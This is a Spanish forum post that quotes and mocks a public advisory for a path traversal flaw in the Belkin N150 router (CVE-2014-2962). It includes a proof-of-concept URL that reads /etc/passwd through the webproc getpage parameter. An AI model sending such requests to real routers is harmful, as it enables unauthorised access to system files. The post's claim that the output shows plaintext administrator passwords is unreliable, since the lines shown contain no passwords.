[h]¿Esto es un router?
¡No! : Es un Belkin… [/h]
https://www.wifi-libre.com/img/members/3/belkin.jpg
Fuente
[list=*]
]Path Traversal Vulnerability in Belkin Router N150 de Rahul Pratap Singh/]
[/list]
Hablemos un rato de este pequeño “exploit” puesto en circulación hoy por Rahul Pratap Singh
https://www.wifi-libre.com/img/members/3/bel2.jpg
Es pequeño, lo pongo aqui :
[code]# Title: Path Traversal Vulnerability
Product: Belkin Router N150
Author: Rahul Pratap Singh
Website: https://0x62626262.wordpress.com
Contact:
Linkedin: https://in.linkedin.com/in/rahulpratapsingh94
Twitter: @0x62626262
Vendor Homepage: http://www.belkin.com
Firmware Tested: 1.00.08, 1.00.09
CVE: 2014-2962
Description:
Belkin N150 wireless router firmware versions 1.00.07 and earlier contain a
path traversal vulnerability through the built-in web interface. The
webproc cgi
module accepts a getpage parameter which takes an unrestricted file path as
input. The web server runs with root privileges by default, allowing a
malicious attacker to read any file on the system.
A patch was released by Belkin but that is still vulnerable.
POC:
http://192.168.2.1/cgi-bin/webproc?getpage=/etc/passwd&var:page=deviceinfo
#root:x:0:0:root:/root:/bin/bash root:x:0:0:root:/root:/bin/sh
#tw:x:504:504::/home/tw:/bin/bash #tw:x:504:504::/home/tw:/bin/msh
Ref:
https://www.kb.cert.org/vuls/id/774788
https://0x62626262.wordpress.com/category/full-disclosure/
[/code]
Podemos ver que con una petición https directa con datos POST >
http://192.168.2.1/cgi-bin/webproc?getpage=/etc/passwd&var:page=deviceinfo
Podemos obtener los credenciales de administrador (guardados en texto pano :pam: ) >
#root:x:0:0:root:/root:/bin/bash root:x:0:0:root:/root:/bin/sh
#tw:x:504:504::/home/tw:/bin/bash #tw:x:504:504::/home/tw:/bin/msh
Esto en si es grave.
Es grave que un fabricante guarde las contraseñas en texto claro.
Es grave que se pueda pasear por toda la interfaz sin ninguna contraseña
Unos errores de principiante inadmisibles para una empresa del tamaño y con la experiencia de Belkin (primer fabricante norte americano de puntos de acceso)
Lo más grave no es esto: Lo más grave es que los de Belkin fueron incapaces de arreglar la brecha.
Es inconcebible que no sean capaces de pasar por una función de hash las contraseñas en lugar de guardar las en texto claro…
No se puede ser así de incompetentes : No es posible.
Prefiero creer que los marcianos han tomado el poder en **Belkin **y ponen puertas traseras en los routers para llevar a cabo su plan malvado para invadir el planeta.
Duele menos la lógica que pensar que unos ingenieros con sueldos a 5 cifras en una multinacional no sepan pasar una cadena por sha-1.
De hecho los corredores del equipo de ciclismo **belkin ** llevan …camisas verdes… …verde… …¡Como los marcianos! : ¡ Es un signo!
Ya he puesto la fuente…
¿Un consejo para arreglar el fallo? … No comprar jamás un router belkin.
Pagas por la marca… que no vale para nada. No es para nada sinónimo de cualidad o de buen soporte.
Y si tienes uno, mirra si no puedes pasar a open-wrt o dd-wrt,
Es la mejor decisión que podrás tomar. .